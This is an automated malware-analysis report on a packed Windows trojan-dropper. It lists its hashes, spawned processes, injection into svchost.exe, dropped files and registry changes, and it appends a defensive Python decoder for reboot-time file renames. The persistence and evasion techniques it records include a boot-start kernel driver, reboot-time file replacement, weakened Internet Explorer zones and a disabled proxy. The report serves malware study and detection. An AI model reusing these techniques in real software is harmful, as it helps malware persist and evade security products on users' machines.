Trojan-Dropper.Win32.Agent.bjw (Kaspersky), Backdoor.Hupigon.64371 (B) (Emsisoft), Backdoor.Hupigon.64371 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Backdoor, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 079f56ead49c756a3b3252c448b9ffd5
SHA1: 591dc67706272cc3301c19bb96b10d22e6cf5573
SHA256: f75b415a68f6d0b292a9f7f2a77bbdb5ca23a78bffac69665a42a7fbe57577e1
SSDeep: 24576:mKsoFg9ZYBcIZld7XgcTmFZO6mYeVfuS/t04u1:IoFdcm8O/hnF03
Size: 846257 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: Plus HD
Created at: 1992-06-20 01:22:17 (this is the constant link timestamp that the Delphi toolchain stamps into every PE it produces, consistent with the Trojan.Win32.Delphi.FD alias; it says nothing about when the sample was actually built)
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
soft256.exe:2724
cnnic_1009.exe:2892
m4.exe:2840
update.exe:3408
setup.exe:2200
setup.exe:3476
setup.exe:3264
%original file name%.exe:1712
idnsvr.exe:4052
The Trojan injects its code into the following process(es):
svchost.exe:1992
File activity
The process soft256.exe:2724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\e1JePg78g.dll (33 bytes)
The process cnnic_1009.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\setup.exe (12214 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)
The process m4.exe:2840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\MP3\svchost.exe (1281 bytes)
The process update.exe:3408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\version.dat (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\uninstall.exe (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\srchsp.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\path.dat (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.exe (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.dat (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\convf.dll (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\austr.dll (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnrbtn.html (486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprov.sys (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cuscfg.dat (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnaux.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ocinfo.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\ieaux.dll (172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\idnreg.dll (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\kwrep.dat (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3\addrmsg.ini (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)
The process setup.exe:2200 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\OCINS\convf.dll (1281 bytes)
%Program Files%\OCINS\replace.dat (343 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\cuscfg.dat (145 bytes)
%Program Files%\OCINS\ctrcfg.ini (230 bytes)
%Program Files%\OCINS\cnrbtn.html (486 bytes)
%System%\drivers\idnaux.sys (10 bytes)
%Program Files%\OCINS\version.dat (482 bytes)
%Program Files%\OCINS\kwrep.dat (191 bytes)
%Program Files%\OCINS\idnaux.dat (39 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\srchsp.dll (32 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
%WinDir%\ocinfo.dat (8 bytes)
%System%\idnreg.dll (36 bytes)
%Program Files%\OCINS\addrmsg.dll (601 bytes)
%Program Files%\OCINS\addrmsg.ini (6 bytes)
The process setup.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\OCINS\cnprovh.dll (601 bytes)
%Program Files%\OCINS\convs.dll (601 bytes)
%Program Files%\OCINS\cndsv.dll (601 bytes)
%Program Files%\OCINS\config.exe (601 bytes)
%Program Files%\OCINS\cuscfg.dat (148 bytes)
%Program Files%\OCINS\ctrcfg.ini (2949 bytes)
%System%\cnprov.dat (1 bytes)
%Program Files%\OCINS\kwacs.dat (16 bytes)
%System%\drivers\cnprov.sys (673 bytes)
%Program Files%\OCINS\idnsvr.exe (601 bytes)
%Program Files%\OCINS\version.dat (479 bytes)
%Program Files%\OCINS\idnsvr.dll (601 bytes)
%Program Files%\OCINS\uninstall.exe (673 bytes)
%Program Files%\OCINS\ieaux.dll (673 bytes)
%Program Files%\OCINS\usrcfg.ini (21 bytes)
%Program Files%\OCINS\cnstc.ini (1 bytes)
The process setup.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.exe (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\ieaux.dll (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\version.dat (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprov.sys (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\kwacs.dat (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnreg.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.dll (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\uninstall.exe (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\config.exe (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\path.dat (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnstc.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\setup.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cnprovh.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\convs.dll (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cndsv.dll (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\idnsvr.dll (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\loader.exe (106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2\cuscfg.dat (148 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)
The process %original file name%.exe:1712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process idnsvr.exe:4052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\OCINS\update\version.dat (482 bytes)
%Program Files%\OCINS\ctrcfg.ini (4 bytes)
%Program Files%\OCINS\austr.dll (65 bytes)
%Program Files%\OCINS\update\data2.cab (9696 bytes)
%Program Files%\OCINS\update\update.exe (273697 bytes)
%Program Files%\OCINS\update\austr.dll (1568 bytes)
%Program Files%\OCINS\usrcfg.ini (130 bytes)
Registry activity
The process soft256.exe:2724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 6A BD 7E 02 BF AD 37 FC 88 F7 6F 47 B3 F0 1D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE security-zone settings so that every host which bypasses the proxy is placed in the Local Intranet zone (which applies weaker security settings than the Internet zone):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE security-zone settings so that all network paths (UNC paths) are placed in the Local Intranet zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all local (dotless) site names not listed in another zone are placed in the Local Intranet zone:
"IntranetName" = "1"
Note that these three values match IE's default Local Intranet configuration and are written whenever a process initializes WinINet, so on their own they are weak evidence; the Shell Folders and Cryptography\RNG "Seed" writes listed for each process are the same kind of background noise.
Proxy use is disabled (together with the deletions below, IE is left with no static proxy and no PAC script and connects directly):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process cnnic_1009.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FC 7A E9 19 9A 0B 73 CD 3F F6 01 BC D3 68 3D"
[HKLM\SOFTWARE\kmedia\cnnic]
"1.0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"setup.exe" = "国际化域名支持" (Chinese: "Internationalized Domain Name Support")
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security-zone settings so that every host which bypasses the proxy is placed in the Local Intranet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE security-zone settings so that all local (dotless) site names not listed in another zone are placed in the Local Intranet zone:
"IntranetName" = "1"
The Trojan modifies IE security-zone settings so that all network paths (UNC paths) are placed in the Local Intranet zone:
"UNCAsIntranet" = "1"
The process m4.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 32 64 65 C7 93 9C 01 27 E3 B3 E7 E3 4E 94 5F"
The process update.exe:3408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F F0 AD 61 62 B6 59 56 4D 15 69 3D E1 82 EA FD"
The process setup.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.42"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\idnaux]
"ErrorControl" = "1"
"ImagePath" = "system32\drivers\idnaux.sys"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"HotIcon" = "%Program Files%\OCINS\config.exe,216"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Default Visible" = "Yes"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
"(Default)" = "C:\PROGRA~1\OCINS\ieaux.dll"
[HKCR\Idnreg.IdnObj.1]
"(Default)" = "IdnObj Class"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
"(Default)" = "IEAux.IEHlprObj.1"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\0\win32]
"(Default)" = "%System%\idnreg.dll"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"Version" = "1.0"
[HKCR\Idnreg.IdnObj.1\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"
[HKCR\IEAux.IEHlprObj\CurVer]
"(Default)" = "IEAux.IEHlprObj.1"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\HELPDIR]
"(Default)" = "%System%\"
[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"(Default)" = "%Program Files%\OCINS\cnrbtn.html"
[HKLM\System\CurrentControlSet\Services\cnprov]
"Group" = "Boot System Extenders"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9A578C98-3C2F-4630-890B-FC04196EF420}]
"Compatibility Flags" = "1024"
[HKLM\System\CurrentControlSet\Services\idnaux]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"CLSID" = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"
[HKLM\System\CurrentControlSet\Services\idnaux\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"
[HKCR\Idnreg.IdnObj]
"(Default)" = "IdnObj Class"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}]
"(Default)" = "IIdnObj"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DescriptionName" = "idnaux"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"MenuStatusBar" = "Chinese Navigation"
"MenuText" = "Chinese Navigation"
[HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Access Internet Keyword]
"Contexts" = "127"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"DisplayName" = "Chinese Navigation"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DependOnService" = "Tcpip"
[HKCR\IEAux.IEHlprObj.1]
"(Default)" = "IEAux Class"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
"(Default)" = "IEAux Class"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0]
"(Default)" = "idnreg 1.0 Type Library"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"exec" = "%Program Files%\OCINS\config.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "yes"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\VersionIndependentProgID]
"(Default)" = "Idnreg.IdnObj"
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
"(Default)" = "IEAux.IEHlprObj"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}]
"(Default)" = "CNNIC_IDN"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DisplayName" = "idnaux"
[HKCR\IEAux.IEHlprObj.1\CLSID]
"(Default)" = "{7605CC7C-00FD-4A5F-BAFD-828342DE6279}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Flags" = "1"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DescriptionName" = "cnprov"
[HKLM\System\CurrentControlSet\Services\cnprov\Security]
"Security" = "01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00"
[HKCR\Interface\{C4CB9237-6A94-4EFD-9FCE-C254B5262984}\TypeLib]
"(Default)" = "{72584095-B0B2-4058-8CDC-6AE69F8B199B}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"ButtonText" = "Chinese Navigation"
[HKLM\System\CurrentControlSet\Services\cnprov]
"ErrorControl" = "1"
[HKLM\System\CurrentControlSet\Services\idnaux]
"Group" = "PNP_TDI"
[HKLM\System\CurrentControlSet\Services\cnprov]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 B5 88 65 78 1A 57 62 B3 A9 DB D6 52 6D B3 41"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\ProgID]
"(Default)" = "Idnreg.IdnObj.1"
[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot System Extenders, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"
[HKLM\System\CurrentControlSet\Services\cnprov]
"DisplayName" = "cnprov"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OCINS]
"UninstallString" = "%Program Files%\OCINS\uninstall.exe"
[HKCR\Idnreg.IdnObj\CurVer]
"(Default)" = "Idnreg.IdnObj.1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
"Icon" = "%Program Files%\OCINS\config.exe,216"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5C3853CF-C7E0-4946-B3FA-1ABDB6F48108}]
"Version" = "*"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "@\??\%System%\@c:\windows\system32\setup.exe.tmp, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3\idnsvr.exe, !\??\%Program Files%\OCINS\idnsvr.exe"
[HKCR\TypeLib\{72584095-B0B2-4058-8CDC-6AE69F8B199B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Idnreg.IdnObj\CLSID]
"(Default)" = "{61DB8FBD-B64B-401E-BDA7-F36E44180805}"
[HKCR\IEAux.IEHlprObj]
"(Default)" = "IEAux Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Cdfs]
"SystemRoot" = "%WinDir%"
[HKLM\System\CurrentControlSet\Services\cnprov]
"ImagePath" = "system32\drivers\cnprov.sys"
[HKCR\CLSID\{61DB8FBD-B64B-401E-BDA7-F36E44180805}\InprocServer32]
"(Default)" = "%System%\idnreg.dll"
The following kernel driver is registered as boot-start ("Start" = 0, SERVICE_BOOT_START): the OS loader loads it before any user-mode code, including security products, runs:
[HKLM\System\CurrentControlSet\Services\cnprov]
"Start" = "0"
The following kernel driver ("Type" = 1) is registered as auto-start ("Start" = 2, SERVICE_AUTO_START) and is loaded by the Service Control Manager at every boot:
[HKLM\System\CurrentControlSet\Services\idnaux]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\Programmable]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{B012491E-8FA4-4851-AA9B-22E33784FBAD}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\ProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\VersionIndependentProgID]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}]
[HKCR\CLSID\{7605CC7C-00FD-4A5F-BAFD-828342DE6279}\InprocServer32]
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\cnprov]
"InstallPath"
"DeleteFlag"
[HKCU\Console]
"KwUnSelf"
[HKLM\System\CurrentControlSet\Services\cnprov]
"SystemRoot"
[HKLM\System\CurrentControlSet\Services\idnaux]
"DeleteFlag"
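The PendingFileRenameOperations value set by setup.exe:2200 above is how the installer gets idnsvr.exe from the user's Temp directory into %Program Files%\OCINS: Session Manager applies the list at the next boot, before any user-mode code (including security software) runs. The decoder below is an added example, not code from the report or from the sample. Its input is constructed from the value above (the report flattens the REG_MULTI_SZ, so the exact original entries are an assumption), and the staging-directory heuristic in flag_staged_installs is my own.

```python
r"""Decode Session Manager's PendingFileRenameOperations (REG_MULTI_SZ).

Added example; not part of the Lavasoft report. Entries written with
MoveFileEx(..., MOVEFILE_DELAY_UNTIL_REBOOT) are applied by smss.exe at the
next boot as (source, destination) string pairs:
  - empty destination            -> delete source
  - destination beginning with ! -> move, overwriting an existing target
  - paths carry the NT prefix \??\ (strip it to get the Win32 path)
"""
import sys
from dataclasses import dataclass
from typing import List

# Constructed from the value recorded for setup.exe:2200 above; the report
# flattens the MULTI_SZ, so this exact layout is an assumption.
SAMPLE = [
    r"\??\C:\DOCUME~1\user\LOCALS~1\Temp\3\idnsvr.exe",
    r"!\??\C:\Program Files\OCINS\idnsvr.exe",
    r"\??\C:\WINDOWS\system32\setup.exe.tmp",
    "",        # empty destination: delete setup.exe.tmp at boot
    "",        # MULTI_SZ terminator, kept by some exporters
]

STAGING_HINTS = ("\\temp\\", "\\local settings\\", "\\appdata\\")   # user-writable
TARGET_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\progra~1\\")


@dataclass
class PendingOp:
    action: str          # "rename" | "replace" | "delete"
    source: str          # Win32 path
    destination: str     # Win32 path, "" for delete


def _to_win32(path: str) -> str:
    """Strip the object-manager prefix MoveFileEx stores (\\??\\ or \\\\?\\)."""
    for prefix in ("\\??\\", "\\\\?\\"):
        if path.startswith(prefix):
            return path[len(prefix):]
    return path


def parse_pending_renames(multi_sz: List[str]) -> List[PendingOp]:
    """Pair up the raw strings; an odd count (after dropping a terminator) is malformed."""
    items = list(multi_sz)
    if len(items) % 2 and items[-1] == "":
        items.pop()
    if len(items) % 2:
        raise ValueError("PendingFileRenameOperations must be source/destination pairs")
    ops = []
    for src, dst in zip(items[0::2], items[1::2]):
        if dst == "":
            ops.append(PendingOp("delete", _to_win32(src), ""))
        elif dst.startswith("!"):
            ops.append(PendingOp("replace", _to_win32(src), _to_win32(dst[1:])))
        else:
            ops.append(PendingOp("rename", _to_win32(src), _to_win32(dst)))
    return ops


def flag_staged_installs(ops: List[PendingOp]) -> List[PendingOp]:
    """Moves from a user-writable staging directory into %WinDir%/%ProgramFiles% at boot."""
    hits = []
    for op in ops:
        src, dst = op.source.lower(), op.destination.lower()
        if op.action != "delete" and any(h in src for h in STAGING_HINTS) \
                and dst.startswith(TARGET_DIRS):
            hits.append(op)
    return hits


def read_live_value() -> List[str]:
    """On Windows read the real value; elsewhere fall back to the constructed sample."""
    if sys.platform != "win32":
        return SAMPLE
    import winreg  # standard library, Windows only
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SYSTEM\CurrentControlSet\Control\Session Manager") as k:
        try:
            value, _ = winreg.QueryValueEx(k, "PendingFileRenameOperations")
        except FileNotFoundError:
            return []
    return value


if __name__ == "__main__":
    ops = parse_pending_renames(read_live_value())
    for op in ops:
        print(f"{op.action:8} {op.source} -> {op.destination or '(delete)'}")
    for op in flag_staged_installs(ops):
        print("SUSPICIOUS staged install:", op.destination)
```

On a live host the value is normally empty or holds a handful of updater cleanups; a move from a Temp directory into %Program Files% or %System%, especially with the "!" overwrite flag, deserves a look at the source file before the reboot happens.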
The process setup.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\OCINS]
"Version" = "2.6.0.0"
[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
